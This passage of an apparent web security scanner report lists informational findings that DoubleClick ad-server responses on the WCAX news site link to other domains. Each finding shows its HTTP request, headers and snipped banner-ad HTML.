Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:35:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3327

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 13713 Template Name = TEST WorldNow Flash I
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<A TARGET="_top" HREF="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/j%3B238869861%3B0-0%3B0%3B29116625%3B4307-300/250%3B41414271/41432058/1%3B%3B%7Esscs%3D%3f[%Click-through URL%]"><IMG SRC="http://s0.2mdn.net/2773093/creativeAsset.jpg?adID=238869861" alt="[%Alt Text%]" BORDER=0></A>
...[SNIP]...
10.53. http://ad.doubleclick.net/adi/wn.loc.wcax/political  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/political

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/political;sz=500x300;wnsz=49;tile=8;wncc=Political;wnpt=S;wnpc=story;wncp=WCAX;wncid=503137;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=99140980? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:35:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 377

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/m;44306;0-0;0;29116625;1261-500/300;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.54. http://ad.doubleclick.net/adi/wn.loc.wcax/political  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/political

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/political;sz=490x25;wnsz=22;tile=6;wncc=Political;wnpt=S;wnpc=story;wncp=WCAX;wncid=503137;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=99140980? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:35:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 601

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/u%3B211870089%3B0-0%3B0%3B29116625%3B9289-490/25%3B30238038/30255915/1%3B%3B%7Esscs%3D%3fhttp://www.greenmtntoursvt.com" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/129574_AM.jpg?adID=211870089" WIDTH="490" HEIGHT="25" alt="Green Mountain Tours" title="Green Mountain Tours"></a>
...[SNIP]...
10.55. http://ad.doubleclick.net/adi/wn.loc.wcax/political  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/political

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/political;sz=468x60;wnsz=1;tile=7;wncc=Political;wnpt=S;wnpc=story;wncp=WCAX;wncid=503137;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=99140980? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:35:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 653

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
29116625%3B1-468/60%3B40072615/40090402/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Master-of-Science-in-Managing-Innovation-and-Information-Technology.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186090_AM.jpg?adID=234573319" WIDTH="468" HEIGHT="60" alt="" title=""></a>
...[SNIP]...
10.56. http://ad.doubleclick.net/adi/wn.loc.wcax/political  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/political

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/wn.loc.wcax/political;sz=728x90;wnsz=41;tile=3;wncc=Political;wnpt=S;wnpc=story;wncp=WCAX;wncid=503137;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=99140980? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:36:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2855

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6959 Template Name = +WorldNow Flash Banner
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<A TARGET="_top" HREF="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/x%3B238976301%3B0-0%3B0%3B29116625%3B3454-728/90%3B41319704/41337491/1%3B%3B%7Esscs%3D%3f[%Click-through URL%]"><IMG SRC="http://s0.2mdn.net/3143129/030711_Consumer_Discover_728x90.gif?adID=238976301" alt="" BORDER=0></A>
...[SNIP]...
10.57. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/promotion1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/wn.loc.wcax/promotion1;sz=300x250;wnsz=52;tile=5;wncc=Promotion%201;wnpt=S;wnpc=story;wncp=WCAX;wncid=452989;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=87321408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 13:16:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2863

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6959 Template Name = +WorldNow Flash Banner
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<A TARGET="_top" HREF="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/m%3B238976430%3B0-0%3B0%3B29116632%3B4307-300/250%3B41319785/41337572/1%3B%3B%7Esscs%3D%3f[%Click-through URL%]"><IMG SRC="http://s0.2mdn.net/3143129/030711_Consumer_Discover_300x250.gif?adID=238976430" alt="" BORDER=0></A>
...[SNIP]...
10.58. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/promotion1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/wn.loc.wcax/promotion1;sz=728x90;wnsz=41;tile=3;wncc=Promotion%201;wnpt=S;wnpc=story;wncp=WCAX;wncid=452989;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=87321408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 13:16:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 634

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script>
var gfEbForceStreaming = 1;

</script>
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2326412&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true"></script>
<noscript>
<a href="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=brd&FlightID=2326412&Page=&PluID=0&Pos=320" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2326412&Page=&PluID=0&Pos=320" border=0 width=728 height=90></a>
...[SNIP]...
10.59. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/promotion1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/promotion1;sz=300x250;wnsz=43;tile=4;wncc=Promotion%201;wnpt=S;wnpc=story;wncp=WCAX;wncid=452989;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=87321408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 13:16:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 626

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
3B238875763%3B3-0%3B0%3B29116632%3B4307-300/250%3B41275501/41293288/1%3B%3B%7Esscs%3D%3fhttp://learn.uvm.edu/?utm_source=WCAX&utm_medium=online&utm_content=300-250&utm_campaign=health" target="_blank"><img border="0" src="http://s0.2mdn.net/2075269/Nursing300x250.gif?adID=238875763" WIDTH="300" HEIGHT="250" alt="" title=""></a>
...[SNIP]...
10.60. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/promotion1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/promotion1;sz=500x300;wnsz=49;tile=7;wncc=Promotion%201;wnpt=S;wnpc=story;wncp=WCAX;wncid=452989;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=87321408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 13:16:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 377

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/x;44306;0-0;0;29116632;1261-500/300;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.61. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/sales-lifestyle

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/sales-lifestyle;sz=468x60;wnsz=1;tile=7;wncc=Sales%20-%20Lifestyle;wnpt=C;wnpc=category;wncp=WCAX;wncid=68446;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_13544=ap;wnad49=wcax;apptype=platform;env=production;ord=81412589? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 653

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
29117532%3B1-468/60%3B40072615/40090402/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Master-of-Science-in-Managing-Innovation-and-Information-Technology.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186090_AM.jpg?adID=234573319" WIDTH="468" HEIGHT="60" alt="" title=""></a>
...[SNIP]...
10.62. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/sales-lifestyle

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/sales-lifestyle;sz=300x250;wnsz=43;tile=4;wncc=Sales%20-%20Lifestyle;wnpt=C;wnpc=category;wncp=WCAX;wncid=68446;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_13544=ap;wnad49=wcax;apptype=platform;env=production;ord=81412589? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2684

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6959 Template Name = +WorldNow Flash Banner
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
10.63. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/sales-lifestyle

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/sales-lifestyle;sz=180x150;wnsz=35;tile=8;wncc=Sales%20-%20Lifestyle;wnpt=C;wnpc=category;wncp=WCAX;wncid=68446;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_13544=ap;wnad49=wcax;apptype=platform;env=production;ord=81412589? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 603

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/m%3B211848897%3B0-0%3B0%3B29117532%3B2928-180/150%3B30237913/30255790/1%3B%3B%7Esscs%3D%3fhttp://www.greenmtntoursvt.com" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/129575_AM.gif?adID=211848897" WIDTH="180" HEIGHT="150" alt="Green Mountain Tours" title="Green Mountain Tours"></a>
...[SNIP]...
10.64. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/sales-lifestyle

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/sales-lifestyle;sz=500x300;wnsz=49;tile=9;wncc=Sales%20-%20Lifestyle;wnpt=C;wnpc=category;wncp=WCAX;wncid=68446;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_13544=ap;wnad49=wcax;apptype=platform;env=production;ord=81412589? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 377

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/w;44306;0-0;0;29117532;1261-500/300;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.65. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/sales-lifestyle

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/sales-lifestyle;sz=728x90;wnsz=46;tile=3;wncc=Sales%20-%20Lifestyle;wnpt=C;wnpc=category;wncp=WCAX;wncid=68446;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_13544=ap;wnad49=wcax;apptype=platform;env=production;ord=81412589? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 625

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
a/b%3B234573070%3B0-0%3B0%3B29117532%3B3454-728/90%3B40072505/40090292/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Masters-in-Early-Childhood-Education.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186088_AM.jpg?adID=234573070" WIDTH="728" HEIGHT="90" alt="" title=""></a>
...[SNIP]...
10.66. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/sales-lifestyle

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/sales-lifestyle;sz=490x25;wnsz=22;tile=6;wncc=Sales%20-%20Lifestyle;wnpt=C;wnpc=category;wncp=WCAX;wncid=68446;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_13544=ap;wnad49=wcax;apptype=platform;env=production;ord=81412589? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 601

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
